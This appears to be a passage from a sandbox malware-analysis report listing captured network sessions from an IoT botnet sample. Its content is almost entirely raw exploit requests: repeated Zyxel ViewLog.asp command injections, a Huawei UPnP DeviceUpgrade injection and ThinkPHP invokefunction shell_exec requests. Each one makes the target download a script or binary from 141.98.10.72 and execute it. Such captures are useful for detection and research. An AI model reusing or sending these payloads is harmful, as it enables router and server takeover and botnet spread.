                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 20 20 20 20 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx </center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        980192.168.2.143815231.136.79.1818080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:10.505388021 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:11.171968937 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:12.515943050 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:15.299736023 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:20.675470114 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:31.427145004 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:52.930138111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        981192.168.2.146075031.136.172.398080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:10.506074905 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:11.203998089 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:12.547817945 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:15.299735069 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:20.675496101 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:31.427145004 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:52.930138111 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        982192.168.2.143311831.44.131.2408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:10.529395103 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        983192.168.2.143393885.72.63.1788080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:10.530801058 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:10.791455984 CET292INHTTP/1.1 404 Not Found
                                                        Content-Encoding: gzip
                                                        Connection: keep-alive
                                                        X-Powered-By: Undertow/1
                                                        Server: WildFly/8
                                                        Content-Length: 79
                                                        Content-Type: text/html
                                                        Date: Wed, 14 Feb 2024 08:35:15 GMT
                                                        Data Raw: 1f 8b 08 00 00 00 00 00 00 00 b3 c9 28 c9 cd b1 b3 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 73 2d 2a ca 2f b2 d1 87 70 6c f4 21 52 49 f9 29 95 76 26 06 26 0a ba 0a 7e f9 25 0a 6e f9 a5 79 29 36 fa 60 51 a0 12 90 19 00 d8 3f 96 41 4a 00 00 00
                                                        Data Ascii: (HML),Is-*/pl!RI)v&&~%ny)6`Q?AJ


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        984192.168.2.144239094.121.96.1568080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:10.533673048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        985192.168.2.143741695.86.75.1518080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:10.540312052 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        986192.168.2.144374294.187.100.1688080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:10.541017056 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        987192.168.2.144832094.187.96.2538080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:10.541152000 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        988192.168.2.145885894.29.241.58080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:10.569253922 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:10.863585949 CET224INHTTP/1.1 403 Forbidden
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 106
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        989192.168.2.1454888197.49.67.4437215
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:11.989263058 CET826OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Content-Length: 430
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 37 32 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.72 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                        Feb 14, 2024 09:35:12.267710924 CET182INHTTP/1.1 500 Internal Server Error
                                                        Content-Type: text/xml; charset="utf-8"
                                                        Server: Linux UPnP/1.0 Huawei-ATP-IGD
                                                        EXT:
                                                        Connection: Keep-Alive
                                                        Content-Length: 398


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        990192.168.2.143633295.101.91.9980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:13.270332098 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:13.492502928 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:35:13 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:13 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 32 31 64 64 35 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 37 31 33 26 23 34 36 3b 32 39 38 32 36 34 32 62 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;121dd517&#46;1707899713&#46;2982642b</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        991192.168.2.145361295.163.54.5880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:13.280015945 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:13.511495113 CET323INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:13 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
